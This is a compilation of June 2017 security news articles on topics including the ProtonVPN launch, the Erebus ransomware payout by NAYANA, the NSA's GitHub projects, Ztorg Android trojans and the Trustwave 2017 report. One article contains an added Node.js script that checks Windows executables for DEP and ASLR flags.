21.6.2017 securityaffairs Safety

ProtonMail announced ProtonVPN is now available to the general public. ProtonVPN is officially out of beta.
You can now directly get ProtonVPN by visiting https://protonvpn.com

After more than 1 year of development, and four months of beta testing by over 10’000 members of the ProtonMail community, we’re finally making ProtonVPN available to everyone. And we really mean everyone, because consistent with our mission to make privacy and security accessible to every single person in the world, we’re also releasing ProtonVPN as a free VPN service.

It has been a long and exciting journey to get here since our team first met at CERN in 2013. Back then, we had an ambitious vision to build an Internet that was free and could continue to reach its full potential as a tool for social progress. Indeed, that was the vision that inspired Tim Berners-Lee to create the World Wide Web at CERN in 1989.

Since then, the Internet has met or even exceeded its promise in certain areas, but this has not come without a cost to society. While the Internet has done a great deal of good, over the course of this digital revolution, we have also lost control over our data, our most intimate secrets, and ultimately our privacy. In certain countries, the Internet has even become a tool for oppression and control, instead of the beacon of hope and freedom it once was.

Back in 2013, we embarked on a journey to change this, by building the tools that could make privacy and security the default online. In 2014, on the 25th anniversary of the web, our efforts culminated with the release of ProtonMail, the world’s first end-to-end encrypted email service. Since then millions of people around the world have embraced our vision, and thanks to your support (and the numerous donations along the way), email is much safer today than it was several years ago.

However, when considering the scope of all that we do online, email is just a small piece of the online world. That’s why we have decided to build ProtonVPN, to better protect the activists, journalists, and individuals who are currently using ProtonMail to secure their online lives. A VPN (Virtual Private Network) allows users to browse the web without being tracked, bypass online censorship blocks, and also increases security by passing all internet traffic through a strongly encrypted tunnel.

The importance of VPNs for online security and privacy is increasing day by day. Back in April of this year, Obama-era FTC rules designed to protect the privacy of internet browsing history were rolled back. Fast forward to today, and attempts are being made to dismantle net neutrality in the US, and several European governments are now calling for increased online surveillance. Last but not least, for over 1.5 billion people around the world, the Internet does not live up to its promise of freedom of information. Instead, the Internet is a highly restricted and censored place, constantly under surveillance, where making a wrong move could lead to imprisonment or worse.

We are also aware that as ProtonMail becomes a stronger force for digital freedom, the censorship of ProtonMail in certain countries is not a matter of if, but a matter of when. Earlier this year, we took the first steps to improve ProtonMail’s availability under censorship by launching an Onion site. With ProtonVPN, we can ensure the accessibility of not only ProtonMail, but all of the world’s digital knowledge and information. This is why we are committed to providing a free version of ProtonVPN.

However, we have done more than make ProtonVPN free. We have also worked to make it the best VPN service ever created, by addressing many of the common pitfalls with VPNs. For example, ProtonVPN features a Secure Core architecture which routes traffic through multiple encrypted tunnels in multiple countries to better defend against network based attacks, and also features seamless integration with the Tor anonymity network. You can learn about all the steps we took to build a secure VPN here.

Lastly, we’re building a VPN service that can be worthy of your trust. We understand that when it comes to VPNs, trust is paramount. Whether it is our transparent VPN threat model, our Swiss jurisdiction, our reputation, our relationship with the community, or the fact that you actually know who we are, we’re committed to building and operating ProtonVPN with the same level of transparency that has come to characterize ProtonMail.

ProtonVPN

To all of you who have supported us over the years, thank you for your support. Unlike companies like Google and Facebook who abuse user privacy to sell advertisements, ProtonMail and ProtonVPN are entirely dependent on users upgrading to paid accounts to cover operating expenses. Without your support, these projects would not be able to thrive and grow. If you appreciate the security and privacy that ProtonVPN provides, and have the means to do so, please consider upgrading to a paid account. This allows us to support the millions around the world without these means.

With your help, the revolution we have started with ProtonMail will continue, and we will reach the day where the Internet serves all of us equally, and reaches its full potential as a tool for freedom.

Best Regards,
The Proton Technologies Team

You can find our launch press release here: https://protonvpn.com/blog/launch-press-release


South Korean hosting provider NAYANA infected by Erebus ransomware, it paid $1 Million to crooks
21.6.2017 securityaffairs Ransomware

South Korean web hosting company NAYANA was hit by the Erebus ransomware that infected 153 Linux servers and over 3,400 business websites the company hosts.
The South Korean web hosting provider NAYANA has paid $1 million in bitcoins to crooks after a Linux ransomware infected its 153 servers, encrypting the 3,400 business websites and their data hosted on them.

The ransomware encrypted files on 153 servers, and roughly 3,400 business websites have been impacted.

“On June 10, South Korean web hosting company NAYANA was hit by Erebus ransomware (detected by Trend Micro as RANSOM_ELFEREBUS.A), infecting 153 Linux servers and over 3,400 business websites the company hosts.” reported Trend Micro that revealed the ransomware used in the attack is Erebus.

The attack happened on June 10; the cybercriminals demanded a payment of 550 bitcoins (over $1.6 million) to unlock the encrypted files. After negotiating with the criminals, NAYANA agreed to pay 397.6 bitcoins (around $1.01 million) in three installments.

The web hosting provider has already paid two installments and will complete the payment once it has recovered the data from two-thirds of the infected servers.
“On June 18, NAYANA started the process of recovering the servers in batches. Some of the servers in the second batch are currently experiencing database (DB) errors. A third payment installment is also expected to be paid after the first and second batches of servers have been successfully recovered.” continues Trend Micro.

The Erebus Linux ransomware was first spotted in September 2016; in February a new version appeared that added a Windows User Account Control (UAC) bypass.

The experts observed that the servers of the Korean hosting provider were running Linux kernel 2.6.24.2, a circumstance that exposed them to known attacks such as the Dirty COW Linux exploit. It is also possible that the attackers exploited flaws in the outdated Apache version 1.3.36 used by the company.
“NAYANA’s website runs on Linux kernel 2.6.24.2, which was compiled back in 2008. Security flaws like DIRTY COW that can provide attackers root access to vulnerable Linux systems are just some of the threats it may have been exposed to.” states Trend Micro.

“Additionally, NAYANA’s website uses Apache version 1.3.36 and PHP version 5.1.4, both of which were released back in 2006. Apache vulnerabilities and PHP exploits are well-known; in fact, there was even a tool sold in the Chinese underground expressly for exploiting Apache Struts.”

The Erebus ransomware targets users in South Korea; it uses the RSA-2048 algorithm to encrypt office documents, databases, archives, and multimedia files. The private key is encrypted using AES encryption and another randomly generated key.

The malicious code appends a .ecrypt extension to the encrypted files.

“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys,” continues the analysis. “The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2048 algorithm that is also stored in the file.”


National Security Agency opens the NSA Github Account that already lists 32 Projects
21.6.2017 securityaffairs BigBrothers

It is official, the National Security Agency (NSA) has presented its GitHub page that includes 32 projects as part of the NSA Technology Transfer Program.
The National Security Agency has opened its GitHub account and presented an official GitHub page. The US intelligence agency employs numerous experts who in the past have demonstrated extraordinary abilities in developing hacking tools, exploits and surveillance solutions.

The work of the NSA experts was secret until Snowden’s revelations, but now the Agency seems to be more social, and the creation of the GitHub account demonstrates it.

Looking at the GitHub account, we can notice that the NSA is sharing 32 different projects as part of the NSA Technology Transfer Program (TTP), while some of these are ‘coming soon.’

“The NSA Technology Transfer Program (TTP) transfers NSA-developed technology to industry, academia, and other research organizations, benefitting the economy and the Agency mission. The program has an extensive portfolio of patented technologies across multiple technology areas” states the description of the NSA program.

Many projects shared by the NSA are very old and were already available online, such as SELinux (Security-Enhanced Linux).

“The NSA Technology Transfer Program (TTP) works with agency innovators who wish to use this collaborative model for transferring their technology to the commercial marketplace,” the agency wrote on the program’s page.

“OSS invites the cooperative development of technology, encouraging broad use and adoption. The public benefits by adopting, enhancing, adapting, or commercializing the software. The government benefits from the open source community’s enhancements to the technology.”

NSA Github Account

Some of the NSA’s other open source projects are listed below:
Certificate Authority Situational Awareness (CASA): A simple tool that identifies unexpected and prohibited certificate authority certificates on Windows systems.
Control Flow Integrity: A hardware-based technique to prevent memory corruption exploitations.
GRASSMARLIN: It provides IP network situational awareness of ICS and SCADA networks to support network security.
Open Attestation: A project to remotely retrieve and verify system integrity using Trusted Platform Module (TPM).
RedhawkSDR: It is a software-defined radio (SDR) framework that provides tools to develop, deploy, and manage software radio applications in real-time.
OZONE Widget Framework (OWF): It is basically a web application, which runs in your browser, allows users to create lightweight widgets and easily access all their online tools from one location.
The full list of NSA’s projects is available here.


Elastic Beam Emerges From Stealth With API Security Solution

21.6.2017 securityweek Security
Redwood City, Calif.-based Elastic Beam emerged from stealth mode on Wednesday with the launch of a security solution designed to detect and block cyberattacks targeting application programming interfaces (APIs).

The company’s flagship product, API Behavioral Security (ABS), is an engine that uses artificial intelligence (AI) to detect threats in real time. Data from ABS is sent to the API Security Enforcer (ASE) to block the attack and prevent the attacker from reconnecting.

According to Elastic Beam, its solution can detect data exfiltration, unauthorized changes or removal of data, distributed denial-of-service (DDoS) attacks, code injections, brute force attempts and authentication via stolen credentials, API memory attacks, WebSocket attacks and other types of external and insider threats.

The product, designed for API gateways, API management platforms and app servers, works in both public and hybrid cloud environments and on premises. The vendor says it also has the ability to scale automatically using elastic clustering.

“We look at the whole traffic pattern between the end-point/client and the system being accessed,” Bernard Harguindeguy, founder and CEO of Elastic Beam, told SecurityWeek. “We implemented AI algorithms that combine advanced AI techniques with our strong API behavior and security expertise to automatically sort out sessions that are not normal.”

“The system does not use predefined policies or security rules, it is self-learning, and uses the AI engine to continuously update knowledge of the environment and traffic. It uses much more than a traditional baseline to identify an attack. Also the attacks are identified as such – not just anomalies. So we will flag anomalies if something is ‘off’ but not really an attack – and we will identify an attack when we believe that it is truly an attack,” Harguindeguy explained.

API Behavioral Security (ABS) dashboard

For forensic analysis and reporting purposes, Elastic Beam says its product provides tracking and reporting capabilities for all API activity. The solution also includes a decoy API feature that relies on a deception mechanism to lure hackers and capture attack information for analysis.

The product is available through a subscription pricing model based primarily on API transaction volumes. Elastic Beam, which has so far been funded by its founders and angel investors, says ABS has already been tested in banks, government agencies, cloud services and IoT environments.


Cybereason Raises $100 Million to Hunt Attackers

21.6.2017 securityweek IT
Boston, MA-based Cybereason today announced that it has raised $100 million in Series D funding from SoftBank Corp. This increases the total investment in the cyber attack detection firm to $189 million since its inception in 2012. It raised $25 million in Series B financing and $59 million in Series C financing, both in 2015.

The new investment follows Cybereason's continued growth: 500% in revenue and almost 200% in staff over the last year. Lior Div, co-founder and CEO of Cybereason, commented, "This new funding allows us to increase our growth through new distribution channels and to develop new technologies."

Tokyo-based SoftBank is not merely Cybereason's major investor, it is also an important customer. "Our strengthened partnership with SoftBank, which has a formidable sales force and enterprise customer base in Japan and a global reach, will also enable us to further expand our presence in the cybersecurity market," added Div. The new capital, he said, enables Cybereason "to expand our products, hire additional talented people and increase the size of our offices in Boston, Tel Aviv, London and Tokyo -- and throughout the broader EMEA and APAC regions."

Cybereason is one of the new breed of endpoint security solutions that rely heavily on machine learning and behavioral analytics to detect threats in real time without relying on malware signatures. Many of its direct competitors have shown similar levels of investment in recent years. Crowdstrike raised $100 million in Series C financing in July 2015, and a further $100 million in Series D in May 2017. Cylance also raised $100 million in Series D funding in June 2016, while SentinelOne raised $70 million in January 2017.

Cybereason, like Endgame (which has raised more than $90 million in funding), seeks to differentiate itself from the competition by not merely detecting anomalies, but actively hunting for the attacker. "This approach," it says, "allows hunting to strengthen the organization's security posture while slowing down the adversary and decreasing their dwell time. The results of a hunt can be used to build new prevention mechanisms, ensuring that the discovered security incidents do not happen again."

"Software," says Div, "is the most powerful force in today’s connected world. People can use its power for good or evil, and the mission of Cybereason is to stop the adversary from gaining an unfair advantage by giving our customers the upper hand."


WebSites Found Collecting Data from Online Forms Even Before You Click Submit
21.6.2017 thehackernews Security

'Do I really need to give this website so much about me?'
That's exactly what I usually think after filling in, but before submitting, a web form that asks for my personal details in order to continue.
I am sure most of you would either close the whole tab or edit the details you had already typed (or that your browser's auto-fill feature filled in) before clicking 'Submit' — wouldn't you?
But closing the tab or editing your information hardly makes any difference, because as soon as you have typed or auto-filled anything into the online form, the website captures it automatically in the background using JavaScript, even if you haven't clicked the Submit button.
During an investigation, Gizmodo discovered that code from NaviStone, used by hundreds of websites, invisibly grabs each piece of information as you fill out a web form, before you hit 'Send' or 'Submit.'
NaviStone is an Ohio-based startup that advertises itself as a service to unmask anonymous website visitors and find out their home addresses.
There are at least 100 websites that are using NaviStone's code, according to BuiltWith, a service that tells you what technology sites employ.
Gizmodo tested dozens of those websites and found that the majority of sites captured visitors' email addresses only, but some websites also captured personal information, like home addresses and other typed or auto-filled data.
How Websites Collect 'Data' Before Submitting Web Forms

Using JavaScript, the websites in question were sending the information a user typed or auto-filled into an online form to a server at "murdoog.com," which is owned by NaviStone, leaving no way out for people who immediately change their minds and close the page.
When the publication asked NaviStone how it unmasks anonymous website visitors, the company declined to reveal anything, saying that "its technology is proprietary and awaiting a patent."
However, when asked whether email addresses are gathered in order to identify the person and their home address, the company's chief operating officer Allen Abbott said NaviStone does not "use email addresses in any way to link with postal addresses or any other form of PII [Personal Identifiable Information]."
"Rather than use email addresses to generate advertising communications, we actually use the presence of an email address as a suppression factor, since it indicates that email, and not direct mail, is their preferred method of receiving advertising messages," Abbott said.
Some websites using NaviStone's code are collecting information on visitors who are not even their customers and have no relationship with the companies.
"Three sites—hardware site Rockler.com, gift site CollectionsEtc.com, and clothing site BostonProper.com—sent us emails about items we'd left in our shopping carts using the email addresses we'd typed onto the site but had not formally submitted," Gizmodo writes.
After the story had gone live, NaviStone agreed to no longer collect email addresses from visitors this way, as Abbott said, "While we believe our technology has been appropriately used, we have decided to change the system operation such that email addresses are not captured until the visitor hits the 'submit' button."
Disable Auto-Fill; It’s Leaking Your Information!
In order to protect yourself from websites collecting your data without your consent, you should consider disabling the form auto-fill feature, which is turned on by default, in your browser, password manager or extension settings.
At the beginning of this year, we also warned you about the auto-fill feature, which automatically fills out web forms based on data you have previously entered in similar fields, but which can be misused by attackers who hide fields (out of sight) in a web form to steal your personal information without your knowledge.
Here's how to turn this feature off in Chrome:
Go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck the "Enable Autofill to fill out web forms in a single click" box.
In Opera, go to Settings → Autofill and turn it off.
In Safari, go to Preferences and click on AutoFill to turn it off.
Also, think twice before entering your details into any web form, before it is too late.


Next Windows 10 Version May Have Built-in EMET Anti-Exploit Program
21.6.2017 thehackernews Safety

It seems Microsoft is planning to build its EMET anti-exploit tool into the kernel of Windows 10 Creator Update (also known as RedStone 3), which is expected to release in September/October 2017.
So you may not have to separately download and install EMET in the upcoming version of Windows 10.
If true, this would be the second big change Microsoft is making in its Windows 10 Fall update, after its plan to remove SMBv1 to enhance users' security.
EMET or Enhanced Mitigation Experience Toolkit, currently optional, is a free anti-exploit toolkit for Microsoft's Windows operating systems designed to boost the security of your computer against complex threats such as zero-day vulnerabilities.

"EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software," Microsoft site reads.
Basically EMET detects and prevents buffer overflows and memory corruption vulnerabilities, often used in zero-day attacks.
A few EMET features are already built into Windows 10 including DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), but the current version of Windows 10 doesn't offer the same level of protection as Windows 10 with EMET installed.
The following chart, created by researchers from Carnegie Mellon University's Software Engineering Institute, clearly indicates that Windows 10 with EMET offers better protection than Windows 10 alone does.
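DEP and ASLR, the two mitigations the article says Windows 10 already has, are opted into per executable through flags in the PE header's DllCharacteristics field, so a quick way to see which of your binaries actually benefit is to read that field. The following is an added example, not Microsoft's, EMET's or the Hacker News' code: a Node.js checker that parses the DOS and PE headers and reports the NX_COMPAT (DEP), DYNAMIC_BASE (ASLR), HIGH_ENTROPY_VA and GUARD_CF flags, exercised on a constructed, header-only PE32+ buffer so it runs offline. The flag values and header offsets are from the published PE/COFF format; the sample buffer is not a loadable program.

```javascript
// Added example (not Microsoft's or EMET's code): read the DllCharacteristics
// field of a Windows PE header to see which image-level mitigations the binary
// opts into. Flag values and offsets follow the PE/COFF specification.

// IMAGE_DLLCHARACTERISTICS_* flag bits from the PE/COFF specification.
const DLL_CHARACTERISTICS = {
  HIGH_ENTROPY_VA: 0x0020, // 64-bit ASLR with high entropy
  DYNAMIC_BASE:    0x0040, // image may be relocated at load time (ASLR)
  NX_COMPAT:       0x0100, // image is compatible with DEP (NX)
  GUARD_CF:        0x4000, // Control Flow Guard instrumented
};

const PE32_MAGIC = 0x10b;
const PE32PLUS_MAGIC = 0x20b;
const PE_SIGNATURE = 0x00004550; // "PE\0\0" read little-endian

// Parse the headers and return which mitigations the image opts into.
// Throws on anything that is not a PE image with a full optional header.
function peMitigations(buf) {
  if (buf.length < 0x40 || buf.toString('latin1', 0, 2) !== 'MZ') {
    throw new Error('not a DOS/PE image: missing MZ signature');
  }
  const peOffset = buf.readUInt32LE(0x3c); // e_lfanew
  if (peOffset + 24 > buf.length || buf.readUInt32LE(peOffset) !== PE_SIGNATURE) {
    throw new Error('PE signature not found');
  }
  const sizeOfOptionalHeader = buf.readUInt16LE(peOffset + 20); // in the COFF header
  const opt = peOffset + 24;                                     // optional header start
  if (sizeOfOptionalHeader < 72 || opt + sizeOfOptionalHeader > buf.length) {
    throw new Error('optional header too short to hold DllCharacteristics');
  }
  const magic = buf.readUInt16LE(opt);
  if (magic !== PE32_MAGIC && magic !== PE32PLUS_MAGIC) {
    throw new Error(`unknown optional header magic 0x${magic.toString(16)}`);
  }
  // DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+.
  const dllChars = buf.readUInt16LE(opt + 70);
  return {
    format: magic === PE32PLUS_MAGIC ? 'PE32+' : 'PE32',
    dllCharacteristics: dllChars,
    dep: (dllChars & DLL_CHARACTERISTICS.NX_COMPAT) !== 0,
    aslr: (dllChars & DLL_CHARACTERISTICS.DYNAMIC_BASE) !== 0,
    highEntropyVa: (dllChars & DLL_CHARACTERISTICS.HIGH_ENTROPY_VA) !== 0,
    cfg: (dllChars & DLL_CHARACTERISTICS.GUARD_CF) !== 0,
  };
}

// Names of the mitigations a report shows as missing, in a fixed order.
function missingMitigations(report) {
  const missing = [];
  if (!report.dep) missing.push('DEP');
  if (!report.aslr) missing.push('ASLR');
  if (report.format === 'PE32+' && report.aslr && !report.highEntropyVa) missing.push('HIGH_ENTROPY_VA');
  if (!report.cfg) missing.push('CFG');
  return missing;
}

// Constructed sample: a minimal, header-only PE32+ image (no sections, not
// loadable) with the requested DllCharacteristics, so the checker runs offline.
function buildSampleHeader(dllCharacteristics) {
  const peOffset = 0x40;
  const optSize = 240; // SizeOfOptionalHeader for PE32+
  const buf = Buffer.alloc(peOffset + 24 + optSize);
  buf.write('MZ', 0, 'latin1');
  buf.writeUInt32LE(peOffset, 0x3c);              // e_lfanew
  buf.writeUInt32LE(PE_SIGNATURE, peOffset);      // "PE\0\0"
  buf.writeUInt16LE(0x8664, peOffset + 4);        // IMAGE_FILE_MACHINE_AMD64
  buf.writeUInt16LE(optSize, peOffset + 20);      // SizeOfOptionalHeader
  const opt = peOffset + 24;
  buf.writeUInt16LE(PE32PLUS_MAGIC, opt);         // Magic
  buf.writeUInt16LE(dllCharacteristics, opt + 70); // DllCharacteristics
  return buf;
}

if (typeof require !== 'undefined' && require.main === module) {
  const samples = {
    hardened: DLL_CHARACTERISTICS.HIGH_ENTROPY_VA | DLL_CHARACTERISTICS.DYNAMIC_BASE | DLL_CHARACTERISTICS.NX_COMPAT,
    legacy: 0,
  };
  for (const [name, flags] of Object.entries(samples)) {
    const report = peMitigations(buildSampleHeader(flags));
    console.log(`${name}: ${report.format} dep=${report.dep} aslr=${report.aslr} missing=[${missingMitigations(report).join(', ')}]`);
  }
}
```

To check a real file, replace the constructed buffer with `require('fs').readFileSync(path)`. The flags only say what the image asks for; system-wide policy (and, where installed, EMET's per-application settings) can still force DEP or ASLR on an image that did not opt in, which is exactly the gap the article says Microsoft intends to close by building those controls into Windows itself.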

Since Microsoft has already announced that the company will discontinue support for EMET in July 2018, we believe the company plans to build support for all remaining EMET features into the next version of Windows 10.
"There are no plans to offer support or security patching for EMET after July 31, 2018. For improved security, our recommendation is for customers to migrate to Windows 10," Microsoft said last year.
A tweet from Alex Ionescu, Windows security expert, with a screenshot hints that Microsoft may release its next stable version of Windows 10 with "built-in EMET into the kernel."
Also, we noticed that Alex's tweet was later retweeted by at least two security researchers from Microsoft's team, which indirectly confirms the news.

We reached out to two of the Microsoft researchers; one of them has not responded yet, while the other declined to comment at this time.
EMET provides both system-wide and application-specific protection, which works by watching internal operating system operations for known security exploits and holes, and blocking attacks on both the OS and third-party applications.
The tool also protects the system against the well-known "untrusted fonts" attack, which is often leveraged in web-based cyber attacks to compromise PCs and install malware.
Besides this, EMET also offers buffer overflow protection to applications that may be vulnerable to stack and buffer overflow attacks that malware uses to interact with the operating system.
So, let's just wait for the big news to be confirmed by Microsoft.


NSA Opens Github Account — Lists 32 Projects Developed by the Agency
21.6.2017 thehackernews BigBrothers

The National Security Agency (NSA) — the United States intelligence agency which is known for its secrecy and working in the dark — has finally joined GitHub and launched an official GitHub page.
The NSA employs genius-level coders and the brightest mathematicians, who continually work to break codes, gather intelligence on everyone, and develop hacking tools like EternalBlue, which was leaked by the Shadow Brokers in April and abused by the WannaCry ransomware last month to wreak havoc worldwide.
The intelligence agency mostly works in secret, but after the Edward Snowden leaks in 2013, the NSA has started (slowly) opening itself to the world. It joined Twitter the same year, after the Snowden leaks, and has now opened a GitHub account.
GitHub is an online service designed for sharing code amongst programmers and the open source community, and so far, the NSA is sharing 32 different projects as part of the NSA Technology Transfer Program (TTP), while some of these are 'coming soon.'
"The NSA Technology Transfer Program (TTP) works with agency innovators who wish to use this collaborative model for transferring their technology to the commercial marketplace," the agency wrote on the program's page.
"OSS invites the cooperative development of technology, encouraging broad use and adoption. The public benefits by adopting, enhancing, adapting, or commercializing the software. The government benefits from the open source community's enhancements to the technology."
Many of the projects the agency listed are years old and have been available on the Internet for some time. For example, SELinux (Security-Enhanced Linux) has been part of the Linux kernel for years.
Some of the NSA's open source projects are listed below:
Certificate Authority Situational Awareness (CASA): A simple tool that identifies unexpected and prohibited certificate authority certificates on Windows systems.
Control Flow Integrity: A hardware-based technique to prevent memory corruption exploitations.
GRASSMARLIN: It provides IP network situational awareness of ICS and SCADA networks to support network security.
Open Attestation: A project to remotely retrieve and verify system integrity using Trusted Platform Module (TPM).
RedhawkSDR: A software-defined radio (SDR) framework that provides tools to develop, deploy, and manage software radio applications in real time.
OZONE Widget Framework (OWF): A web application that runs in the browser and allows users to create lightweight widgets and easily access all their online tools from one location.
You can check out the full list of NSA's projects here.




Italian Foreign Ministry Targeted by the Hacker Movement Anonymous

21.6.2017 Novinky/Bezpečnost Hacking
The Italian Foreign Ministry announced on Tuesday that it is investigating an attempted hacker attack on its computers. A hacker group that describes itself as the Italian branch of the Anonymous movement had earlier published some data that it claims to have stolen from the ministry's computers. It is not yet clear whether any sensitive information is among this data, the Reuters agency reported.
The ministry said in a statement that its technicians are cooperating with the prosecutor's office in the investigation, but gave no details about the attempt to penetrate its computers.

The hackers announced the attack on the server cyberguerrilla.org. They uploaded to the server, for example, spreadsheets titled "staff accommodation" and "travel/expenses". They also posted links to files containing hundreds of e-mail addresses.

"Just keep enjoying yourselves at your summits, in your committees... G7, G8, intelligence services, surveillance, terrorism," the page says. "We already knew that we Italians pay. In the meantime, please enjoy the uncensored publication of some data stolen from your precious information system," the hackers wrote.


Cisco Talos releases the BASS open source malware signature generator
21.6.2017 securityaffairs Security

Cisco Talos intelligence group released an open source framework named BASS that is designed for automatically generating antivirus signatures from malware.
BASS is an automated signature synthesizer: it automatically creates signatures from the analysis of malicious code belonging to previously generated clusters.

The BASS tool aims to simplify malware analysis and its main goals are to improve resource usage and make malware analysis easier.

BASS is designed to reduce the resource usage of Cisco's ClamAV open source antivirus engine by generating more pattern-based signatures instead of hash-based ones.

Every day thousands of new signatures are added to the ClamAV database, and many of them are hash-based. Unfortunately, using a hash to detect malware identifies a single malicious file rather than an entire malware cluster.

BASS tool

“BASS (pronounced “bæs”) is a framework designed to automatically generate antivirus signatures from samples belonging to previously generated malware clusters. It is meant to reduce resource usage of ClamAV by producing more pattern-based signatures as opposed to hash-based signatures, and to alleviate the workload of analysts who write pattern-based signatures. The framework is easily scalable thanks to Docker.” reads the description of the framework published on GitHub.

“Please note that this framework is still considered in the Alpha stage and as a result, it will have some rough edges. As this tool is open source and actively maintained by us, we gladly welcome any feedback from the community on improving the functionality of BASS.”

BASS is written in Python and implemented as a cluster of Docker containers. It is scalable and exposes web services that allow it to interact with other tools.

Experts at Cisco Talos explained that the BASS framework is able to import malware clusters from various sources. Once the malware cluster is filtered to check that the files correspond to the input expected by the BASS framework, the binaries are disassembled using IDA Pro or another disassembler, and BASS then searches the samples for common code that can be used to generate the signature.


Two Ztorg Trojans Removed from Google Play Store Are Definitely Better
21.6.2017 securityaffairs Android

For the second time in a month, Google removed malicious apps infected with the Ztorg Trojans that could allow attackers to root targeted devices.
Most software developers update their apps to patch vulnerabilities and add new features. But when the software is malware, an update could be the worst thing to do. The Google Play Store is always working to prevent malware from being downloaded by unsuspecting users, and recently two apps built with the Ztorg malware were removed. The two apps, “Magic Browser” and “Noise Detector,” are believed to have been benign when they were originally uploaded to the Play Store, but the bad guys updated the software using the malware toolkit over time.

Ztorg Trojans

The Ztorg Malware toolkit was identified by Kaspersky Labs in September, 2016 with “Guide for Pokémon Go.” At the time it was identified the Guide had been downloaded over 500,000 times and researchers estimate at least 6,000 successful infections. Since that time, dozens of apps associated with Ztorg have been distributed and eventually removed from the Google Play Store. And like all good developers, the bad guys using Ztorg are adding features and capabilities over time.

Once the initial app is installed, it utilizes a wide range of advanced techniques to evade detection, get updates from the command and control infrastructure and ultimately try to get root on the phone. From Fortinet researchers:

It implements many emulator detection features. It detects the Android SDK emulator, but also emulators from Genymotion, Bluestacks and BuilDroid. It also detects tainted environments. Several of its checks will be difficult to bypass.
It uses string obfuscation, based on XOR.
It communicates with a remote server using DES-CBC encryption.
It downloads, installs and launches an Android application from that remote server.
What happens when your smartphone is infected with a Ztorg trojan? Like most malware, the bad guys’ ultimate objective is to make money. Initial Ztorg trojans leveraged AdWare to generate money for the bad guys through legitimate advertising networks. Some of the techniques included redirecting webpages, messing with search results and collecting information about what sites you visit. These are legitimate, if unwanted, business activities, but in the case of the bad guys distributing trojan apps, the users participate unknowingly. The bad guys get all the profits, and the users get a poorly performing phone that may even become unstable or unusable.

The two apps recently removed from the Google Play Store, “Magic Browser” and “Noise Detector” show an evolution of Ztorg Trojan capabilities and include some nifty new techniques for making illegitimate money. Premium Rate SMS is a business model where an individual sends a specific text message and the fees are automatically charged to the user’s mobile phone bill. For example, you could donate money for disaster relief simply by texting an amount with your phone. The latest Ztorg trojan leverages this Premium Rate SMS system, with the proceeds going to the bad guys. And like the rest of the Ztorg system, they use some sophisticated techniques to maximize their profits and minimize their chances of being caught.

Once infected, the trojan lies dormant for 10 minutes. In this way, if the user notices something odd, they are less likely to associate it with the app they just installed. After the delay, the trojan sends the first five digits of the phone’s International Mobile Subscriber Identity (IMSI) to the C&C servers. This part of the IMSI identifies what network the phone is connected to, and in what country. With this information the C&C can determine which Premium Rate SMS services are available and the trojan starts racking up the bills. And since most of these SMS services will reply with a txt message receipt or notice, the Ztorg Trojans delete incoming SMS messages. It seems obvious that a user would notice missing legitimate messages, but in the meantime the bad guys are counting their profits.

Mobile phones are convenient because they are compact, powerful and use a lot of simple shortcuts to make up for the lack of a keyboard and a large screen. App stores make it easy to install new apps, but it isn’t always obvious what the apps themselves are doing.

“The Ztorg Trojan continues to appear on the Google Play Store, accompanied by new tricks to bypass security and infect as many different Android devices and OS versions as possible. Even if a victim downloads what is clearly a clean app, there is no guarantee that it will still be clean in a few days’ time. Users, Google and security researchers need to remain vigilant at all times and to be proactive about protection,” says Roman Unuchek, researcher at Kaspersky Labs.


Time to Detect Compromise Improves, While Detection to Containment Worsens: Report

21.6.2017 securityweek Security
Cost of Malvertising is Minimal; Price of Zero-days is Rising, Researchers Say

Throughout 2016, Trustwave investigated hundreds of data breaches in 21 different countries, and conducted thousands of penetration tests across databases, networks and applications. An analysis of key findings from this activity is presented in the 2017 Trustwave Global Security Report published Tuesday (PDF).

The result is a mixed bag. Overall, security defenses have slightly improved, but attacks continue to evolve. Detection is improving. Trustwave says the median time to detect a compromise has decreased from 80.5 days in 2015 to 49 days in 2016. The difference between self-detected and third-party detections is, however, dramatic: just 16 days for self-detected and 65 days for externally detected.

It should surprise no-one that a company that has invested in security technology able to detect intrusions would detect intrusions faster than a company that relies on external detections. Nevertheless, this demonstrates the effectiveness of those controls in reducing the dwell time and reducing the attackers' window for exfiltration.

Containment, however, has not improved to any similar degree. The duration from intrusion to containment has dropped from 63 days in 2015 to 62 days in 2016; but the time taken from detection to containment has worsened slightly from 2 days to 2.5 days.

According to Trustwave's figures, North America geographically, and retail vertically, are the most breached sectors. POS breaches rose sharply -- particularly in North America, which has been slow to adopt EMV cards -- from 22% of breaches in 2015 to 31% in 2016.

Malvertising remained the number one source of traffic to exploit kit landing pages; and the cost of malvertising is remarkably low. Trustwave ran its own experiment running online ads testing for vulnerable versions of Flash. "Researchers," notes the report, "estimate an attacker could reach approximately 1,000 computers with exploitable vulnerabilities for about $5 -- less than $.01 per vulnerable machine — far less than the $80 to $400 per 1,000 computers attackers pay for access to infected machines, depending on geolocation."

SecurityWeek asked Lawrence Munro, worldwide VP of SpiderLabs at Trustwave, for his two biggest takeaways from this year's report. What concerns him most is the continuing instance of common vulnerabilities in the majority of applications. "These are not esoteric vulnerabilities," he said, "but ones that map closely to the OWASP Top 10." During 2016, Trustwave's application scanning services found that 99.7% of applications had at least one vulnerability, while the mean number of vulnerabilities was 11 per application.

"Trustwave's on-demand penetration testing service, uncovered almost 30,000 vulnerabilities in web applications in 2016. Analysts classified 79 percent of them as informational or low-risk vulnerabilities, 11 percent as medium-risk, 7 percent as high-risk and 3 percent as critical, the most severe category."

Among the critical vulnerabilities, 13.8% involved authentication bypass, 5.7% involved Heartbleed leakage, 5.1% involved vertical privilege escalation, 4.8% involved unencrypted sensitive data and 4.2% were SQLi vulnerabilities.

It is worth stressing that Trustwave's vulnerability scanning was undertaken for customers on commercial applications -- and the clear implication is that developers are still not building in security during development before release.

Munro's second takeaway is the cost of vulnerabilities for sale on the underground market. Trustwave's researchers discovered an alleged zero-day Windows vulnerability being offered for sale at $95,000. Although not following through with an actual purchase, Trustwave researchers on the underground forums believe this was a genuine zero-day being genuinely sold.

